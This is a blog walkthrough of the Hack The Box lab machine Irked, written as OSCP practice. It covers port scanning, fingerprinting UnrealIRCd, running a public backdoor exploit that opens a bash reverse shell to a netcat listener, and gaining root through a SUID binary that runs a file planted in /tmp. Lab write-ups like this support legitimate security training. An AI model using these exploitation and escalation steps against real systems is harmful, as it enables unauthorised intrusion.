Hack The Box — Irked — without Metasploit (TJNull’s list for OSCP)

Daniyal Ahmed
5 min readMay 14, 2023


This is my 11th write-up for Irked, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.

In a general penetration test or a CTF, there are usually 3 major phases that are involved.

  1. Enumeration and Scanning (Information Gathering).
  2. Initial Foothold.
  3. Privilege Escalation.

Let’s get started with the box!


In order to hack into a system we need to first gather some information about it. For that, we use Nmap to scan the ports of the target machine to find out what services are running; services that we can target. First let’s try to find out what ports are open and then we will run a detailed scan only on those ports to save time.

nmap -p- --max-retries=1
nmap -p-

We can see what ports are open here. Let’s do a detailed nmap on these ports.

nmap -sC -sV -O -A -T4 -Pn -p22,80,111,6697,8067,60447,65534

Meanwhile, it’s running let’s visit the web-server to see what we have there.


Here, we just have an Image and a text saying “IRC is almost working!”.

I think that one of the open ports are IRC, nmap is scanning in the background anyways. We will be sure once it’s completed. For now, Let’s do some directory busting.

gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.txt -x php,html,log,txt -t 200 -k - no-error

It only shows /manual and /server-status directories. Nothing interesting here. Let’s see what nmap found out.

detailed nmap

Here we found out that port 6697,8067,65534; all of them are running UnrealIRCd.

IRC is actually Internet Relay Chat commonly used for chat rooms. To exploit this we need to know what version of UnrealIRC is running.

Let’s try to connect to this port with netcat.

nc 6697

So we have a connection, and I have no idea how to speak IRC language. Let’s try ‘HELP’ and see if it gives us some commands.

Error 451

It gives Error code 451, saying “You have not registered”. So let’s google this error code.

And Google served me the following link:


IRC register

Here, I can see some commands that I need to execute to register first. Let’s give dummy data and see what happens.

IRC version

And it returned a lot of things, and we can see what version of Unreal is running and that is

Okay, You know what we do when we have a version for a service, don’t you?

searchsploit Unreal

We have a Backdoor metasploit module, but we are not gonna use it. Since, we are preparing for OSCP lol.


Let’s search for Unreal Backdoor on Google. That’s what I found:


First, see the code and put our IP and port for the reverse connection.

Let’s run it.

And it tells us that it requires an IP and Port of the target (of course) and it also requires a parameter of -payload which has 3 options, (python, netcat,bash).

Let’s get a bash shell.

First start a listener.

nc -lvnp 8080

Now execute the python script.

python irc.py 6697 -payload bash

And it says “Exploit sent successfully!”

Let’s check the listener.

And we got a shell! :)

Let’s upgrade the shell first.

python -c 'import pty;pty.spawn("/bin/bash")'

Press CTRL+Z to background it.

stty raw -echo



And then hit Enter twice.

We are back in the shell. Now finally

export TERM=xterm

And we have a full tty shell.

Privilege Escalation

First things first, let’s check what commands we can run as sudo.

sudo -l

And sudo is not installed.

Let’s check the files with SUID.

find / -perm -u=s -type f 2>/dev/null

There’s this viewuser binary file that I am not aware of. Let’s run this and see what it does.

It says “/tmp/listusers: not found”.

Hmm… Interesting…!

Let’s create a file listusers in /tmp and put a shell invoking script in that and see if it runs.

nano /tmp/listusers
===================inside the file=============

Let’s make it executable.

chmod +x /tmp/listusers

Now let’s run the viewuser binary.

And we are root!




Daniyal Ahmed
Daniyal Ahmed

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